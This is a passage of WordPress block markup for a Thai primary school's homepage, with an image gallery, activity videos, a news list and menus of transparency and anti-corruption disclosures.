title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 